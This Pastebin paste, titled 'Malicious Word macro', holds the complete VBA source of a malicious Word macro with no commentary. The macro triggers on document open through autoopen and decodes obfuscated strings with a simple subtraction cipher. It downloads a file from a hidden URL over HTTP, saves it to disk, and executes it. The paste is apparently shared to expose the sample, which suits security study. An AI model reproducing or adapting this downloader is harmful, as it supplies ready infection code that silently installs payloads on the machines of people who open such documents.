Advertisement
dynamoo

Malicious Word macro

Feb 3rd, 2015
426
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Attribute VB_Name = "ThisDocument"
  2. Attribute VB_Base = "1Normal.ThisDocument"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = True
  8. Attribute VB_Customizable = True
  9. Private Const tocFp6Ci = "RHmhiglW"
  10. Private Const lu0ADI = "“Œ¼¬«•¿ËºÒÉÖ"
  11. Private Const FXC0O = "FcXBDjpJ"
  12. Private Const OfmF = "´Ò…¥¥ÍدÅ··Þ¸ÈΣ°Óԧ׽"
  13. Private Const iD2E0Ifr = "isuHYmuy"
  14. Private Const YaoZ6ISB = "ÌÔØ°¾šØèáéºÈÙ"
  15. Private Const vymArH = "DVuVgasc"
  16. Private Const wPWCLsRmA = "‹›É"
  17. Private Const V8aAdPb = "IIirEgAf"
  18. Private Const TYRE = "–²Ìä´Ú°Ì½—Ê’³‰¹"
  19. Private Const SORyht2aNVn = "WqTYmiRe"
  20. Private Const Z5AlucBiW = "³ÕÇ¿à͸“Ö̾"
  21. Private Const HFfeUiZo = "bdVuKCmU"
  22. Private Const gvFktaB = "¶©£Å"
  23. Private Const seq = "fDJRuIHX"
  24. Private Const EVsZjgGped = "¹¬¯¾áw‰È´¶»Øª¼Ï³¸"
  25. Private Const dgL8Y5 = "jpwmSbca"
  26. Private Const iRqo = "ÆÔêÓÆÆɏÕïÒ"
  27. Private Const Oat7OoU5O = "oclJEhjQ"
  28. Private Const CDQluD = "蹚"
  29. Private Const GuXH1 = "sPnfbnET"
  30. Private Const h3OXMLBCsI = "ÛÄâÖœt»¼ÝՐܬ¢ºá•Ä׳¡µæË"
  31.  
  32. Sub s5AHNe()
  33.  PtBTpJ
  34. End Sub
  35. Sub WGRW()
  36.      s5AHNe
  37. End Sub
  38. Sub autoopen()
  39.      s5AHNe
  40. End Sub
  41. Public Sub PtBTpJ()
  42. On Error GoTo errHere
  43.  
  44. Dim hk5tg As String
  45.  
  46. Dim ghjrtg As String
  47. Dim ktyreg As String
  48.  
  49. ghjrtg = PwlVK1OLyI(h3OXMLBCsI, GuXH1)
  50. ktyreg = Environ(PwlVK1OLyI(CDQluD, Oat7OoU5O)) & PwlVK1OLyI(iRqo, dgL8Y5)
  51.  
  52. If PfnG(ghjrtg, ktyreg) = False Then
  53.  
  54.     GoTo ExitHere
  55. End If
  56.  Set yjukj5wef = CreateObject(PwlVK1OLyI(EVsZjgGped, seq))
  57. yjukj5wef.Open Environ(PwlVK1OLyI(gvFktaB, HFfeUiZo)) & PwlVK1OLyI(Z5AlucBiW, SORyht2aNVn)
  58.  
  59. ExitHere:
  60.     Exit Sub
  61. errHere:
  62.  
  63.     Resume ExitHere
  64.  
  65. End Sub
  66.  
  67. Public Function PfnG(strTarget As String, fdgert3r As String, Optional strUN As String, Optional strPW As String) As Boolean
  68. On Error GoTo errHere
  69.  
  70. Dim dsfrt34t43g As Object
  71. Dim yukjh4 As String
  72.  PfnG = True
  73. Set dsfrt34t43g = CreateObject(PwlVK1OLyI(TYRE, V8aAdPb))
  74. With dsfrt34t43g
  75.     .Open PwlVK1OLyI(wPWCLsRmA, vymArH), strTarget, False, strUN, strPW
  76.     .setRequestHeader PwlVK1OLyI(YaoZ6ISB, iD2E0Ifr), PwlVK1OLyI(OfmF, FXC0O)
  77.     .Send
  78.     If lqj4OnON(fdgert3r, .responseBody) = False Then
  79.         GoTo errHere
  80.     End If
  81. End With
  82.  
  83. ExitHere:
  84.     Set dsfrt34t43g = Nothing
  85.     Exit Function
  86.  
  87. errHere:
  88.      PfnG = False
  89.     Resume ExitHere
  90.    
  91. End Function
  92.  
  93. Private Function lqj4OnON(strFilePath, bytArray) As Boolean
  94. On Error GoTo errHere
  95.  
  96.  
  97. Dim objStream  As Object
  98.  lqj4OnON = True
  99. Set objStream = CreateObject(PwlVK1OLyI(lu0ADI, tocFp6Ci))
  100. With objStream
  101.     .Type = 1
  102.     .Open
  103.     .Write bytArray
  104.     .SaveToFile strFilePath, 2
  105. End With
  106.  
  107. ExitHere:
  108.     Exit Function
  109. errHere:
  110.      lqj4OnON = False
  111.     Resume ExitHere
  112.  
  113. End Function
  114.  
  115.  
  116.  
  117. Public Function PwlVK1OLyI(ByVal strData As String, ByVal strKey As String)
  118.  
  119. Dim bData() As Byte
  120. Dim bKey() As Byte
  121. bData = StrConv(strData, vbFromUnicode)
  122. bKey = StrConv(strKey, vbFromUnicode)
  123. For i = 0 To UBound(bData)
  124. If i <= UBound(bKey) Then
  125. bData(i) = bData(i) - bKey(i)
  126. Else
  127. bData(i) = bData(i) - bKey(i Mod UBound(bKey))
  128. End If
  129. Next i
  130.  PwlVK1OLyI = StrConv(bData, vbUnicode)
  131. End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement